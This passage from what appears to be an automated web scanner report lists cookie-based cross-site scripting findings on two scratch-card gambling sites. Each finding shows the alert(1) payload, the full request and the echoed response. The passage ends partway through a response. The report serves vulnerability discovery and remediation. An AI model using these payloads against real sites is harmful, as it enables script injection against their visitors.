GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013793635'%3balert(1)//e5ec88b1b5a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57467
Content-Type: text/html
Set-Cookie: ARC=13013793635%27%3Balert%281%29%2F%2Fe5ec88b1b5a; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013793635';alert(1)//e5ec88b1b5a&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.370. http://www.primescratchcards.com/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ea9da--><script>alert(1)</script>a9a4a88d1aa was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ea9da--><script>alert(1)</script>a9a4a88d1aa; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57515
Content-Type: text/html
Set-Cookie: ARC=130137ea9da%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea9a4a88d1aa; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ea9da--><script>alert(1)</script>a9a4a88d1aa">
...[SNIP]...

3.371. http://www.primescratchcards.com/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcba7'%3balert(1)//71b7a400578 was submitted in the ARC cookie. This input was echoed as bcba7';alert(1)//71b7a400578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bcba7'%3balert(1)//71b7a400578; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20446
Content-Type: text/html
Set-Cookie: ARC=130137bcba7%27%3Balert%281%29%2F%2F71b7a400578; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137bcba7';alert(1)//71b7a400578&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.372. http://www.primescratchcards.com/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f7ff5--><script>alert(1)</script>bd18fc8ec55 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f7ff5--><script>alert(1)</script>bd18fc8ec55; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20494
Content-Type: text/html
Set-Cookie: ARC=130137f7ff5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebd18fc8ec55; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f7ff5--><script>alert(1)</script>bd18fc8ec55">
...[SNIP]...

3.373. http://www.primescratchcards.com/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba420"%3balert(1)//0165cf47649 was submitted in the ARC cookie. This input was echoed as ba420";alert(1)//0165cf47649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ba420"%3balert(1)//0165cf47649; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20446
Content-Type: text/html
Set-Cookie: ARC=130137ba420%22%3Balert%281%29%2F%2F0165cf47649; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137ba420";alert(1)//0165cf47649' border='0' width='1' height='1'>
...[SNIP]...

3.374. http://www.scratch2cash.com/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7dca"-alert(1)-"951fde2eaf5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMf7dca"-alert(1)-"951fde2eaf5; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1546523937.1305546138.1305546138.1305546138.1; __utmc=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: BO=FMf7dca"-alert(1)-"951fde2eaf5; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 44002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf7dca"-alert(1)-"951fde2eaf5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.375. http://www.scratch2cash.com/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe5d"-alert(1)-"c88e84d4dce was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMafe5d"-alert(1)-"c88e84d4dce; BO=FM; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1546523937.1305546138.1305546138.1305546138.1; __utmc=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMafe5d"-alert(1)-"c88e84d4dce; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 44002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMafe5d"-alert(1)-"c88e84d4dce";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a06c"-alert(1)-"520d6f030bd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM1a06c"-alert(1)-"520d6f030bd; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: BO=FM1a06c"-alert(1)-"520d6f030bd; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1a06c"-alert(1)-"520d6f030bd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59db6"-alert(1)-"65fa3a5ec60 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM59db6"-alert(1)-"65fa3a5ec60; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM59db6"-alert(1)-"65fa3a5ec60; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM59db6"-alert(1)-"65fa3a5ec60";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2c4e"-alert(1)-"8a0e8f0750 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMa2c4e"-alert(1)-"8a0e8f0750; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: BO=FMa2c4e"-alert(1)-"8a0e8f0750; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa2c4e"-alert(1)-"8a0e8f0750";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac554"-alert(1)-"99961b07b3d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMac554"-alert(1)-"99961b07b3d; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMac554"-alert(1)-"99961b07b3d; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
